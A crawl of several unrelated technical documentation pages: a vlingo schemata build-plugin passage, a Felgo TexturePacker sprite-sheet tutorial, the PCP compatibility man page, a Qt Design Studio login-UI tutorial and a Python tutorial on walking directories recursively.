within the ACME organisation would look like this: ACME:RnD:com.example:MySchema:1.0.5. By default, the plugin expects your schema specification .vss files to be in the src/main/vlingo/schemata folder within your project. To publish these to the registry, you need to configure the push-schemata goal with: the target registry URL, your organization, and unit. the schema reference and the previous version, in case you're updating a previous version for each schema A complete configuration for this goal might look like the example below. For additional details on configuration parameters and defaults, please refer to BUILD PLUGINS. <execution><goals><goal>push-schemata</goal></goals><configuration><srcDirectory>${basedir}/src/main/vlingo/schemata</srcDirectory><schemataService><url></url><clientOrganization>Vlingo</clientOrganization><clientUnit>examples</clientUnit></schemataService><schemata><schema><ref>Vlingo:examples:io.vlingo.examples.schemata:SchemaDefined:0.0.1</ref><src>SchemaDefined.vss</src><previousVersion>0.0.0</previousVersion></schema><schema><ref>Vlingo:examples:io.vlingo.examples.schemata:SchemaPublished:0.0.1</ref></schema></schemata></configuration></execution> The pull-schemata goal provides for retrieving sources generated from schemata stored in the registry. Per default, the generated sources will be written to target/generated-sources/vlingo and be included in the project's compile path. The goal needs to be configured with: the schemata instance URL, your organization, and unit the reference of each schema version to consume The following example makes the build put a SchemaDefined.java file generated from the schema version identified by the reference Vlingo:examples:io.vlingo.examples.schemata:SchemaDefined:2.0.1 file into target/... <execution><id>pullSchemata</id><goals><goal>pull-schemata</goal></goals><configuration><schemataService><url></url><clientOrganization>Vlingo</clientOrganization><clientUnit>examples</clientUnit></schemataService><schemata><schema><ref>Vlingo:examples:io.vlingo.examples.schemata:SchemaDefined:2.0.1</ref></schema></schemata></configuration></execution>
https://docs.vlingo.io/vlingo-schemata
CC-MAIN-2021-04
en
refinedweb
Check out this quick tour to find the best demos and examples for you, and to see how the Felgo SDK can help you to develop your next app or game! Cool graphics are essential to probably every game, but you always have to keep in mind that memory is limited, especially on older devices. In this tutorial you will learn how to use the available memory more efficiently, speed up loading sprites and even drawing them, with the help of TexturePacker. First, follow this link and download TexturePacker. While downloading, take a look at these 2 short and great videos by Code'n'Web, explaining the very basics of what we are talking about in this tutorial (about 3 minutes each): SpriteSheets - TheMovie - Part 1 SpriteSheets - TheMovie - Part 2 In short, sprite sheets have these advantages: After you finish installing, run TexturePacker. You can use the free trial version for this guide. Loading every sprite from a separate file has many disadvantages, especially in memory usage and performance. First of all, using file formats such as png or jpeg can reduce the total size of your game, but it won't affect the memory (RAM) usage while your game is running. The sprites have to be uncompressed into the RAM where they "become" textures the graphics processor can use. This means that every single pixel of the sprite consumes the same amount of memory (4 Byte per pixel with the standard RGBA8888 image format). E.g. a 512x512 pixel png completely filled with black color has a file size of under 5KB, but will still use 1MB (4 Bytes per pixel * width * height) of RAM. The rectangular shape of the sprite usually doesn't match the particular sizes that hardware demands and needs to be changed by the system before they can get passed to the GPU. Worst case would be a hardware that can only process square sprites with width and height matching a power of 2 (128x128,256x256,...). If we have a 140x140 sprite, it will automatically be altered to match the hardware constraints. Since a square of 128x128 would be too small, it will be packed in a 256x256 square, and all the remaining space is unused, but still consumes memory when loading the sprite into the RAM. So instead of 76 KB (4 Bytes per pixel * width * height) for the 140x140 sprite, we will now need 256KB of memory space. That's more than 3 times the original space. This adds up quickly, because lots of sprites will be used in a game. E.g. a 512x512 sprite needs 1MB. Some might say: "Calm down bro, I got 1GB of RAM in my iPhone 5, I can handle your 200 single sprites, no worries!". But you have to keep in mind that your game should maybe also run on an iPod Touch 4 with only 256MB. Also consider that you can't fill all this memory just with sprites of your application. Other applications will use parts of the RAM for their data at the same time. Here is a list of iOS devices and their RAM (Memory): List of iOS devices. But don't worry, you will learn below how sprite sheets can be created with a power-of-two size by combining several sprites so that less to no extra padding is added. Also the standard RGBA8888 image format with 4 Byte per pixel can be an unnecessary waste of memory. By default, images are stored with 8 bit per color channel. This is 32 bits (= 4 Bytes) for red, green, blue and alpha. With 32 bits you can represent 2^32 = 4,294,967,296 different colors, which you don't always need. Background images can be optimized very well by choosing a different format. They don't need the alpha channel because they are always behind everything else. The color channels' bit depth can be reduced to e.g. 5 bits for red, 6 bits for green (more for green because the human eye is more accurate with green colors) and 5 bits for blue. Suddenly you need only half of the memory you needed before. Furthermore, dithering randomizes the errors introduced by the reduction of the color depth and makes it less visible. This is all supported by TexturePacker. Fewer draw calls usually improve the performance. Draw calls are expensive because each draw call needs state changes. The CPU will wait for the GPU to finish its current draw command and set the new states. This disturbs the pipelining in the GPU and causes a lot of idle time in the CPU. Additionally, transferring data, e.g. vertex data, to the graphics device is quite slow. In theory, there is a point where more draw calls with less data each are better. Since we have mostly rectangles with 4 vertices each in a 2D-engine and hardly any other data this point cannot be reached in practice. In a nutshell, sprite sheets help that the game and the graphics device can work better in parallel because of fewer interruptions. Because several game objects share the same texture with a sprite sheet they can be displayed through one draw call. This doesn't work if the rectangles are overlapping because they must be blended in the correct order. Fortunately, the Qt renderer puts as many non-overlapping items as possible in one draw call. This speeds up the rendering performance a lot, even in crowded scenes. You probably want to have different texture sizes for different screen resolutions. Creating the three different versions for sd, hd and hd2 of all images is an annoying and tedious task for the artists. Fortunately, TexturePacker makes it easy and fast to export the sprite sheets with different scaling settings. Read the section about Automatic Content Scaling for more information. We made a quick performance test comparing our new TexturePackerAnimatedSprite component with the native Qt AnimatedSprite component. In this test we added instances of them at random positions on the screen until the frame rate dropped below 30 frames per second. Here are the results: As you can see here, the difference between the Qt and our sprite implementation is bigger on slower hardware. Felgo can show about 35% more sprites on high-end devices and 100% more on low-end mobile devices! If the Qt renderer wouldn't use an own internal sprite sheet the differences would be even greater. The Felgo implementation is also better in terms of memory consumption. The test program, compiled by MinGW in release mode, with 8000 of our sprites used 145 MB memory space. It used 185 MB with 8000 Qt sprites. So our sprite implementation needs about 25% less memory. Internally, Qt automatically creates sprite sheets at runtime of normal Image components. While this is great if you have few images of small size, the Qt solution has several disadvantages: The Felgo solution solves all of the above Qt issues. Thus we recommend using a custom sprite sheet created with TexturePacker over the Image and Sprite solutions of Qt. However, when beginning to prototype a game, using the QML Image element and SpriteSequence or AnimatedSprite is perfectly fine. For the best performance in published games though, switch to the TexturePacker components by Felgo. You can get TexturePacker from here. TexturePacker is an extremely powerful, easily accessible and well-designed tool. It supports all required features and can export to arbitrary resolutions, which makes it a great fit to export the sd, hd and hd2 textures based from your high-res versions. The best thing is, it is written with Qt so it is available for all desktop platforms! The advantage of texture packing tools is that you can automatically put all your images into a single texture. At exporting, you can then change the resolution of the image for the 3 main resolutions sd, hd and hd2 (see the How to create mobile games for different screen sizes and resolutions guide for more information). So you can work with a single version of your graphics in highest resolution, and scale them down in no time. TexturePacker generates 2 kind of files: The packed sprite sheet of the Squaby Demo for example looks like this: {"frames": { "10.png": { "frame": {"x":2,"y":2,"w":32,"h":26}, "rotated": false, "trimmed": false, "spriteSourceSize": {"x":0,"y":0,"w":32,"h":26}, "sourceSize": {"w":32,"h":26} }, "15.png": { "frame": {"x":36,"y":2,"w":32,"h":26}, "rotated": false, "trimmed": false, "spriteSourceSize": {"x":0,"y":0,"w":32,"h":26}, "sourceSize": {"w":32,"h":26} }, ... // the definitions for all the other images follow here, automatically generated by the texture packing tools ... }}, "meta": { "app": "", "version": "1.0", "image": "squaby.png", "format": "RGBA8888", "size": {"w":128,"h":256}, "scale": "0.25", "smartupdate": "$TexturePacker:SmartUpdate:e5683c69753f891cee5b8fcf8d21cf93$" } } } Let's take a look at this great tool and let's use it to create a little project. We are using some sprites of the Felgo game Squaby for this guide. You can download the resources here: resources In the TexturePacker GUI, click Add smart folder, navigate to our Felgo project, and add the texturepacker-resources folder or simply drag and drop your raw assets folder into the window. Now you can see all the sprites from that folder on the left hand side. If you change anything within the folder, TexturePacker will automatically pick up all the changes. It's also possible to arrange your sprites in subfolders and refer to them with their relative path later, or even add multiple folders to the same sprite sheet - this can be handy for larger games where you have the same items on multiple sprite sheets/levels. Below that, in the bottom right corner, is the size of your sprite sheet and the amount of memory it will use in the RAM. In the center you can see how TexturePacker arranges all the sprites in a optimized way, representing your resulting sprite sheet. We will take a closer look at some of the most important options on the right hand side. Like I mentioned above, the standard format would be RGBA8888 with 4 Bytes per pixel (Red, Green, Blue and Alpha for transparency). With this setting our sprite sheet will use 2048KB of memory, as you can see in the bottom right of the TexturePacker GUI. If we change it to RGB4444, we discard half of the color information, ending up with half the memory used, which is a huge improvement. Go ahead and try it out! Saving 1MB didn't convince you about this features strength? Then we will do the math again with a hd2 texture. 2048 * 2048 * 4 Bytes results in 16MB (!) of memory needed in the RAM for just one texture. So with RGB4444 we can save 8MB (!!!) with each texture. HUUUUGE! Of course, half the color can also cause problems, especially with gradients. This is where TexturePacker's killer feature Dithering comes into play. Try out the different dithering options and take a close look at the sprites. While the towers and Squabies still look very good, the digit sprites (5, 10, 15) are designed so gradient heavy (especially with the shadow) that even with dithering we are not fully satisfied with the outcome. In this case the best way would probably be splitting the sprite sheets into one with gradient heavy sprites and one with the others, and chose different image formats for each of them. Of course it always depends on the number of sprites you have, if the memory win is worth the trade-off from having more sprite sheets. In this tutorial we will just stick to RGBA8888 so we can go on, make sure you changed the image format back to it. You simply create your images for the highest resolution and let TexturePacker scale them down for lower resolutions. Regarding this, I highly recommend reading How to create mobile games for different screen sizes and resolutions if you haven't done so already. This will be the different resolutions of your scene on different devices (while the logical size of your scene stays 480x320 to not affect the game logic): This means, the common work-flow would be: In the scaling variants menu, enter the settings like in the picture below and click apply. And what's the thought behind saving the same images 3 times in different sizes? Again, saving RAM is the answer. On lower resolution devices you don't need huge hd2 sprites, so Felgo uses the smaller ones instead, to save memory. Felgo DOES support it, so make sure it's activated! If you want to find out more about any of the options, just hover your mouse above them and read the tool-tips. Just one more thing to add regarding image formats. RGB565 saves some of the color information and completely discards the alpha information, which makes it perfect to reduce the size of background images. This is also used internally in Felgo when you use the BackgroundImage component. Fine, we covered the most important options for our tutorial, and are nearly ready to publish our sprite sheet, we are just missing a name for our data file and the texture file. Click the button with (...) next to Data File, locate the assets/img folder within your Felgo project and save the file as {v}squaby.json. The "{v}" is a placeholder for the scaling subfolders like "+hd" and "+hd2". The path should now be something like ".../squaby/assets/img/{v}squaby.json". TexturePacker will automatically fill in the Texture File name for you. Now click Publish sprite sheet and all your sprite sheets for the different resolutions are created. You can also save this settings as a *.tps file by clicking Save project. TexturePackerAnimatedSprite, TexturePackerSpriteSequence and TexturePackerSprite support content scaling like the MultiResolutionImage component. This allows you to create the game only once for a logical scene size and automatically resize the images based on the screen. To use content scaling together with the TexturePacker components, export 3 different versions of your high-res graphics: The high-res hd2 version with a scene resolution of 1920x1280, the hd version with 960x640 and the sd version with 480x320. Just modify the Scale setting in TexturePacker. When your images are made for the hd2 resolution, export it with scale = 1 for the hd2 texture, with scale = 0.5 for the hd texture and with scale = 0.25 for the sd texture. The setting is displayed in the following image. TexturePacker also creates the corresponding JSON file. The Scale is set to 0.25 for exporting the sd image and json file. Place the image and JSON files in the correct directories like in this example: If you thought this simple tutorial will finally become super tricky now, I have to disappoint you - more simple stuff is about to come. :) Jump into our main.qml, and delete most of it to look like this import Felgo 3.0 import QtQuick 2.0 GameWindow { Scene { }// Scene }// GameWindow Now we got a GameWindow with an empty Scene where we will place our sprites next. Let's add a single sprite to our Scene import Felgo 3.0 import QtQuick 2.0 GameWindow { Scene { TexturePackerAnimatedSprite { id: nailgunSprite source: "../assets/img/squaby.json" frameNames: ["nailgun.png"] x: 100 y: 100 }// TexturePackerAnimatedSprite }// Scene }// GameWindow All we needed is the TexturePackerAnimatedSprite component and set the name of the sprite as the TexturePackerAnimatedSprite::frameNames and the path to the json file to TexturePackerAnimatedSprite::source. As you can see, the name of the sprite in the sprite sheet is exactly the same as it was as a single sprite. Did you notice the plural of "frameNames" and its usage as list? Although the TexturePackerAnimatedSprite is mainly for sprite animations it can also be used for static images. It does only update its graphics if necessary and has therefore a good performance. Keep in mind that the frameNames property is actually a list of strings. Additionally we added an id and moved the sprite to the defined x/y coordinates. If you run the project, you can see our nail gun sprite, pretty easy. Let's modify this sprite at runtime. If you already played Squaby, you know that the towers can be upgraded. With every upgrade, the nailgun will look different. We will quickly simulate this behavior. Add this after your sprite: MouseArea { anchors.fill: nailgunSprite onClicked: { if(nailgunSprite.frameNames[0] === "nailgun.png") { nailgunSprite.frameNames = ["nailgunUpgradeFire.png"]; } else if(nailgunSprite.frameNames[0] === "nailgunUpgradeFire.png") { nailgunSprite.frameNames = ["nailgunUpgradeBoth.png"]; } else{ nailgunSprite.frameNames = ["nailgun.png"]; } } }// MouseArea This is the reason we gave the sprite an id; so we can access its properties with the id. What we are doing here is changing the frameNames of the sprite with each click on it. The sprite automatically gets redrawn if its frameNames have been changed. Run the project and try it out! This looks too static for your taste? You want some animations? No problem sir, your wish is my command: import Felgo 3.0 import QtQuick 2.0 GameWindow { Scene { TexturePackerAnimatedSprite { id: squabySprite source: "../assets/img/squaby.json" frameNames: ["squ1-walk-1.png", "squ1-walk-2.png", "squ1-walk-3.png", "squ1-walk-4.png"] interpolate: false anchors.centerIn: parent frameRate: 3 } } } We just added a walking Squaby, quite similar to the static sprite. We added the TexturePackerAnimatedSprite component, set the path to our json file to the filename. Additionally we added an id and centered the sprite sequence in our scene. If you run the project you can admire that cute little walking Squaby. But everyone knows, this little monsters do not only walk around, they jump and scare the sh** out of us! This time we use a TexturePackerSpriteSequence with multiple TexturePackerSprite children to control several animations at once. Each of these TexturePackerSprite describes an animation. For example, the animation has the name "walk", and it runs at 20 frames per second. All the sprites used for this animation are set to frameNames in the correct order. Although I'm already totally frightened of what's about to come, replace our sprite animation with this: } MouseArea { anchors.fill: squabySprite onClicked: { squabySprite.jumpTo("jump") } }// MouseArea }// TexturePackerSpriteSequence } } By clicking you can switch to the "jump" animation. When one cycle ends it has a 75% chance switch to the "jump" animation and a 25% chance to play "jump" again. Now we only need to tell the Squaby to stop running and jump instead. This is done in our MouseArea below the sprite sequence. If we click the Squaby, we use the TexturePackerSpriteSequence::jumpTo() function to change the animation. Take a deep breath, fasten your seatbelt and then run your project to try it out! What? That didn't scare you? I guess that means you are pretty damn tough! Compared to you I'm a total wreck right now, so let's stop here with this lesson. If you have any questions regarding this tutorial, don't hesitate to visit the support forums. Visit Felgo Games Examples and Demos to gain more information about game creation with Felgo and to see the source code of existing apps in the app stores.
https://felgo.com/doc/howto-texture-packer/
CC-MAIN-2021-04
en
refinedweb
PCPCompat, pcp-collectl, pmwebd — backward-compatibility in the Performance Co-Pilot (PCP) Introduction The Performance Co-Pilot (PCP) is a toolkit designed for monitoring and managing system-level performance. These services are distributed and scalable to accommodate the most complex system configurations and performance problems. In order to achieve these goals effectively, protocol and on-disk compatibility is provided between different versions of PCP. It is feasible (and indeed encouraged) to use current PCP tools to interrogate any remote, down-rev or up-rev pmcd(1) and also to replay any historical PCP archive (the PCP testsuite includes PCP archives created over 20 years ago!). From time to time the PCP developers deprecate and remove PCP utilities, replacing them with new versions of utilities providing comparable features. This page describes replacement utilities for historical PCP tools. PCP-Collectl The pcp-collectl utility has been superceded by pmrep(1) from PCP v5 onward. The equivalent of pcp-collectl subsystem reporting is achieved as follows: - pmrep :collectl-sc Processor subsystem view. - pmrep :collectl-sm Memory subsystem view. - pmrep :collectl-sd Aggregate disks view. - pmrep :collectl-sD Per-disk-device view. - pmrep :collectl-dm-sD Device mapper view. - pmrep :collectl-sn Network subsystem view. PCP-Webapps The standalone web applications packaged with older PCP versions have been superceded by grafana-server(1) with the grafana-pcp plugin. This plugin provides an implementation of the Vector application, as well as data sources for pmdabpftrace(1) (bpftrace(8) scripts) and pmseries(1) (fast, scalable Redis-based time series analysis). Pmwebd The pmwebd daemon has been superceded by pmproxy(1) from PCP v5 onward. By default, pmproxy will now listen on both its original port (44322) and the PCP web API port (44323) when the time series support is built. pmproxy provides a compatible implementation of the live PMWEBAPI(3) interfaces used traditionally by the Vector web application (see the “PCP-Webapps” section). It also provides extensions to the original pmwebd REST APIs (such as derived metrics, namespace lookups and instance domain profiles), support for the HTTPS protocol, and fast, scalable time series querying using the pmseries(1) REST API and redis-server(1). The partial Graphite API emulation provided by pmwebd has not been re-implemented - applications wishing to use similar services could use the scalable time series REST APIs described on PMWEBAPI(3). See Also pcp(1), pmcd(1), pmrep(1), pmproxy(1), pmseries(1), pmdabpftrace(1), redis-server(1), grafana-server(1) and PMWEBAPI(3). Referenced By The man pages pcp-collectl(1), pcpcompat(1) and pmwebd(1) are aliases of PCPCompat(1).
https://dashdash.io/1/pmwebd
CC-MAIN-2021-04
en
refinedweb
Log In UI - Part 1 Illustrates how to use wizard templates to create a simple UI that contains a text label, push buttons, and a logo. Log In UI - Part 1 is the first in a series of tutorials that build on each other to illustrate how to use Qt Design Studio to create a simple UI with some basic UI components, such as pages, buttons, and fields. Part 1 describes how to use the Qt Design Studio wizard templates to create a Qt Quick project and a button UI control, and how to modify the files generated by the wizard templates to design your own UI. The Learn Qt Quick sections provide additional information about the tasks performed by the wizards and about the basics of QML and Qt Quick. Creating the UI Project For the purposes of this tutorial, you will use the empty wizard template. Wizard templates are available also for creating UIs that are optimized for mobile platforms and for launcher applications. For more information about the options you have, see Creating Projects. To create a project: - Select File > New File or Project > General > Qt Quick Application - Empty > Choose. - In the Name field, enter the project name: loginui1. When naming your own projects, keep in mind that they cannot be easily renamed later. - In the Create in field, enter the path to the folder where you want to store the project files. You can move project folders later without problems. - Select Next (or Continue on macOS) to continue to the Define Project Details page. - In the Screen resolution field, select the initial size of the UI. In this tutorial, we use the smallest predefined size, 640 x 480. You can easily change the screen size later in Properties. - Select Finish (or Done on macOS) to create the project. Your project should now look something like this in the Design mode: The UI is built using a Rectangle QML type that forms the background and a Text type that displays some text. Note: The visibility of views depends on the selected workspace, so your Qt Design Studio might look somewhat different from the above image. To open hidden views, select View > Views in the Design mode. For more information about moving views around, see Managing Workspaces. Learn Qt Quick - Projects and Files Qt Design Studio creates a set of boilerplate files and folders that you need to create a UI using Qt Quick and QML. The files are listed in the Projects view. For more information, see Viewing Project Files. - The loginui1.qmlproject project file defines that all QML, JavaScript, and image files in the project folder belong to the project. Therefore, you do not need to individually list new files when you add them to the project. - The loginui1.qml file defines the functionality of the UI. For the time being, it does not do anything. - The Screen01.ui.qml file defines the appearance of the UI. For more information, see Qt Quick UI Forms. - The qtquickcontrols2.conf file specifies the selected UI style and some style-specific arguments. - The imports folder contains a Constants.qml file that specifies a font loader for the Arial font and a qmldir module definition file that declares the Constant QML type. For more information, see Module Definition qmldir Files. In addition, the QtQuick subfolder contains the Studio components and effects QML types. You can ignore the subfolder for now, because it is not used in this tutorial. QML files define a hierarchy of objects with a highly-readable, structured layout. Every QML file consists of two parts: an imports section and an object declaration section. The QML types and functionality most common to UIs are provided in the QtQuick import. You can view the QML code of an ui.qml file in the Text Editor view. For more information about creating a QML file from scratch, see First Steps with QML. Next, you will edit the values of the properties of the UI elements to create the main page of the UI. Creating the Main Page You will now change the values of the properties of the Rectangle component to add a gradient to the UI background and those of the Text component to set the title text in a larger strong font. In addition, you will import an image as an asset and add it to the page. To be able to use an image in the UI, you must add it to your project in the Assets tab of Library. Click here to open the Qt logo in a browser and save it as a file on your computer. The image is only used for decoration, so you can also use any other image or just leave it out. To preview the changes that you make to the UI while you make them, select the (Show Live Preview) button on the Form Editor view toolbar or press Alt+P. The Screen01.ui.qml file that the wizard template created for you should be open in the Design mode. If it is not, you can double-click it in the Projects view to open it. To modify Screen01.ui.qml in Form Editor: - Select Rectangle in the Navigator view to display its properties in the Properties view. - In the Color field, select the (Linear Gradient) button to add a linear gradient to the screen background. Click the start point (1) and end point (2) to specify the gradient colors. Drag and drop the points along the gradient bar to specify where the gradient starts and ends. In this tutorial, the color changes from white to green (#41cd52), starting mid-screen, at position 0.5. You can use your favorite colors or select a predefined gradient in the Gradient Picker. For more information, see Picking Gradients. - Select Text in Navigator to display its properties in Properties. - In the id field, enter the id pageTitle, so that you can easily find the title component in Navigator and other Qt Design Studio views. - In the Text field, enter the page title: Qt Account. - In the Font group, Size field, set the font size of the title: 24 pixels. - In the Font style field, select the B button to use a strong font. - Drag and drop the Qt logo from the Assets tab of Library to the top-left corner of the rectangle. Qt Design Studio automatically creates a component of the Image type for you with the path to the image file set as the value of the Source field in Properties. - In the id field, change the id of the image to logo. - Select File > Save or press Ctrl+S to save your changes. Your UI should now look something like this in the Design mode and live preview: Learn Qt Quick - QML Types The Qt Quick module provides all the basic types necessary for creating UIs. It provides a visual canvas and includes types for creating and animating visual components, receiving user input, and creating data models and views. To be able to use the functionality of Qt Quick types, the wizard template adds the following import statements to the QML files that it creates: import QtQuick 2.15 import loginui1 1.0 You can view the import statements in the Text Editor view. The Library view lists the QML types in each Qt module that are supported by Qt Design Studio. You can use the basic types to create your own QML types, and they will be listed under My QML Components. This section is only visible if you have created custom QML components. The Rectangle, Text, and Image types used in this tutorial are based on the Item type. It is the base type for all visual elements, with implementation of basic functions and properties, such as type name, ID, position, size, and visibility. For more information, see Use Case - Visual Elements In QML. For descriptions of all QML types, see All QML Types in the Qt reference documentation. Regtangle Properties The basic Rectangle QML type is used for drawing shapes with four sides and four corners. You can fill rectangles either with a solid fill color or a gradient. You can specify the border color separately. By setting the value of the radius property, you can create shapes with rounded corners. If you want to specify the radius of each corner separately, you can use the Rectangle type from the Qt Quick Studio Components module instead of the basic rectangle type. It is available in the Studio Components tab of Library. Text Properties The Text type is used for adding static text to the UI, such as titles and labels. You can select the font to use and specify extensive properties for each text item, such as size in points or pixels, weight, style, and spacing. To display custom fonts in the list of available fonts in Properties, add them in the Assets tab of Library. If you want to create a label with a background, use the Label type from the Qt Quick Controls module instead of the Text type. Image Properties The Image type is used for adding images to the UI in several supported formats, including bitmap formats such as PNG and JPEG and vector graphics formats such as SVG. You must add the images to your project in the Assets tab of Library to be able to use them in designs. If you need to display animated images, use the Animated Image type, also available in the Qt Quick - Basic tab of Library. Creating a Push Button You can use another wizard template to create a push button and to add it to the project. The wizard template creates a reusable button component that appears under My QML Components in Library. You can drag and drop it to Form Editor and modify its properties in Properties to change its appearance and functionality. If you find that you cannot use the wizard template nor the ready-made button controls available in the Qt Quick Controls 2 tab in Library to create the kind of push button that you want, you can create your button from scratch using basic QML types. For more information, see Creating Buttons and Creating Scalable Buttons and Borders. To create a push button by using the wizard template: - Select File > New File or Project > Files and Classes > Qt Quick Controls > Custom Button > Choose. - In the Component name field, enter a name for your button type: PushButton. - Select Finish (or Done on macOS) to create the button. Your button should now look something like this in the Design mode: Learn Qt Quick - Qt Quick Controls The Custom Button wizard template creates a Button QML type that belongs to the Qt Quick Controls 2 module. It is a push-button control that can be pushed or clicked by the user. Buttons are normally used to perform an action or to answer a question. The Button type inherits properties and functionality from another QML type. These enable you to set text, display an icon, react to mouse clicks, and so on. To be able to use the functionality of the Button type, the wizard template adds the following import statements to the PushButton.ui.qml file: import QtQuick 2.15 import QtQuick.Templates 2.1 as T import loginui1 1.0 The Qt Quick Templates 2 module provides the functionality of the Button type. The module is imported as T, and the alias is added to the Button type definition to indicate that the Button type from the Qt Quick Controls 2 module is used, instead of some other type with the same name. T.Button { id: control width: 100 height: 40 font: Constants.font implicitWidth: Math.max( buttonBackground ? buttonBackground.implicitWidth : 0, textItem.implicitWidth + leftPadding + rightPadding) ... Rectangle { id: buttonBackground implicitWidth: 100 implicitHeight: 40 opacity: enabled ? 1 : 0.3 border.color: "#41cd52" border.width: 1 anchors.fill: parent radius: 20 } ... Next, you will change the appearance of the button by modifying its properties. Styling the Button You can now modify the properties of the PushButton type to your liking. To make the changes apply to all the button instances, you must make them in the PushButton.ui.qml file. The Custom Button wizard template adds a normal state and a down state to change the button background and text color when the button is clicked. You will now change the colors in all states. When you make changes to the button in the base state, they are automatically applied to the other states. However, the property values that have been explicitly changed in the down state are not changed automatically and you have to change them separately in that state. To change the button property values: - Select the button background in Navigator to display its properties in Properties. - In the Color field, select (Actions) > Reset to reset the button background color to the default color, white. - In the Border Color field, select Actions > Set Binding to use the gradient color (#41cd52) as the border color. You can also use the color picker to change the color. - Press Enter or select OK to save the new value. - In the Radius field, enter 20 to give the button rounded corners. - In the States view, select the down state and modify the background and border color as above. - Select the text item in Navigator to display its properties in Properties. - In the Text Color field, select Actions > Reset to reset the text color to the default color, black. - In the Font style field, select the B button to use the strong font. - In the States view, select the down state to set the button text color to the same green as the border. - Select File > Save or press Ctrl+S to save your changes. Your button should now look something like this: Learn Qt Quick - Property Bindings An object's property can be assigned a static value which stays constant until it is explicitly assigned a new value. In this tutorial, the color values you set in Binding Editor are static. However, to make the fullest use of QML and its built-in support for dynamic object behavior, you can use property bindings that specify relationships between different object properties. When a property's dependencies change in value, the property is automatically updated according to the specified relationship. Behind the scenes, the QML engine monitors the property's dependencies (that is, the variables in the binding expression). When it detects a change, it re-evaluates the binding expression and applies the new result to the property. For more information, see Property Binding. Next, you will use the PushButton type in the main UI QML file, Screen01.ui.qml to add two instances of the button to the UI and to modify their text labels. Adding Buttons to the UI You will now add two button instances to the UI and modify their labels. - Double-click Screen01.ui.qml in Projects to open it in Form Editor. - Drag and drop two instances of the PushButton type from Library to Form Editor. - Select one of the buttons in Navigator to modify its id and text label in Properties. - In the Id field, enter loginButton. - In the Text field, enter Log In and select tr to mark the text translatable. - Select the other button, and change its id to registerButton and text label to Create Account. Again, mark the text translatable. - When an element is selected, selection handles are displayed in its corners and on its sides. Use the selection handles to resize the buttons so that the text fits comfortably on the button background. In this tutorial, the button width is set to 120 pixels. - Move the cursor on the selected button to make the selection icon appear. You can now drag the button to another position in Form Editor. Use the guidelines to align the buttons below the page title: - Select File > Save or press Ctrl+S to save your changes. The first iteration of your UI is now ready and should now look something like this in the Design mode and live preview: Learn Qt Quick - QML Ids Each QML type and each instance of a QML type has an id that uniquely identifies it and enables other objects' properties to be bound to it. An id must be unique, it must begin with a lower-case letter or an underscore character, and it can contain only letters, numbers, and underscore characters. For more information, see The id Attribute. Next Steps To learn how to add more UI controls and position them on the page using anchors and layouts so that the UI is scalable, see the next tutorial in the series, Log In UI - Part 2. For a more advanced example of creating a menu button and using it to construct a button bar, see Side Menu. Files: - loginui1/PushButton.ui.qml - loginui1/Screen01.ui.qml - loginui1/imports/loginui1/Constants.qml - loginui1/imports/loginui1/qmldir - loginui1/loginui1.qml - loginui1/loginui1.qmlproject Images: Available under certain Qt licenses. Find out more.
https://doc.qt.io/qtdesignstudio/qt-design-studio-loginui1-example.html
CC-MAIN-2021-04
en
refinedweb
Overview - Introduction - Print a directory tree - List file sizes in a directory recursively - Using os.walk() to get the total size of a directory - Recursively copy from one directory to another - Conclusion - Reference links Introduction A common task when working with files is to walk through a directory, that is, recursively get every file in every directory starting in some location. The Python 3 os module has several functions useful for working with files and directories. One in particular, os.walk() is useful for recursively going through a directory and getting the contents in a structured way. These examples will show you a couple options for walking a directory recursively. Print a directory tree This example will recursively walk through a directory and only print out names of directories. It will ignore files. # print_dirs.py import os def print_dirs_recursively(root_dir): root_dir = os.path.abspath(root_dir) print(root_dir) for item in os.listdir(root_dir): item_full_path = os.path.join(root_dir, item) if os.path.isdir(item_full_path): print_dirs_recursively(item_full_path) List file sizes in a directory recursively You can walk yourself by getting the contents of a directory, seeing if it's a file or a directory, and recursing. This example will provide a function that will recurse through a directory, and print out every file with its size. # recurse_dir.py import os # Print every file with its size recursing through dirs def recurse_dir(root_dir): root_dir = os.path.abspath(root_dir) for item in os.listdir(root_dir): item_full_path = os.path.join(root_dir, item) if os.path.isdir(item_full_path): recurse_dir(item_full_path) else: print("%s - %s bytes" % (item_full_path, os.stat(item_full_path).st_size)) Using os.walk() to get the total size of a directory There's nothing wrong with the examples above, but there is a more powerful way to go through directories recursively, and that is with the os.walk() function. The os.walk() function is powerful because it gives some structure to the recursion. In the previous examples, if we wanted a list of directories and a list of files in two separate lists for each directory we recurse, we'd have to make it ourselves. With os.walk we get a tuple for every directory that contains the path, a list of directories, and a list of files. You can walk a directory top down or bottom up. It defaults to top down which is usually more convenient and expected. This example will walk through a directory and sum up the total file sizes. # dir_size.py import os def dir_size(root_dir): total_size = 0 for (dirpath, dirs, files) in os.walk(root_dir): for filename in files: file_size = os.stat(filename).st_size total_size += file_size print("%s - %s bytes" % (os.path.join(dirpath, filename), file_size)) print("Total size: %d" % total_size) if __name__ == '__main__': # Get full size of home directory dir_size(os.expanduser("~")) Recursively copy from one directory to another The shutil module in the standard library provides a function called shutil.copytree() which will copy one directory tree to a new location. It requires the target directory to be non-existent though. It will fail if the destination directory exists. This function demonstrated below will copy to a target directory even if it exists. It will overwrite files if they already exist and create directories if needed. # copy_recursive.py import os import shutil import sys from pathlib import Path def copy_recursive(source_base_path, target_base_path): """ Copy a directory tree from one location to another. This differs from shutil.copytree() that it does not require the target destination to not exist. This will copy the contents of one directory in to another existing directory without complaining. It will create directories if needed, but notify they already existed. If will overwrite files if they exist, but notify that they already existed. :param source_base_path: Directory path :param target_base_path: Directory path :return: None """ if not Path(source_base_path).is_dir() or not Path(target_base_path).is_dir(): raise Exception("Source and destination directory and not both directories.\nSource: %s\nTarget: %s" % ( source_base_path, target_base_path)) for item in os.listdir(source_base_path): # Directory if os.path.isdir(os.path.join(source_base_path, item)): # Create destination directory if needed new_target_dir = os.path.join(target_base_path, item) try: os.mkdir(new_target_dir) except OSError: sys.stderr.write("WARNING: Directory already exists:\t%s\n" % new_target_dir) # Recurse new_source_dir = os.path.join(source_base_path, item) copy_recursive(new_source_dir, new_target_dir) # File else: # Copy file over source_name = os.path.join(source_base_path, item) target_name = os.path.join(target_base_path, item) if Path(target_name).is_file(): sys.stderr.write("WARNING: Overwriting existing file:\t%s\n" % target_name) shutil.copy(source_name, target_name) Conclusion After reading this, you should be able to walk through a directory recursively and get the file information you need.
https://www.devdungeon.com/content/walk-directory-python
CC-MAIN-2021-04
en
refinedweb
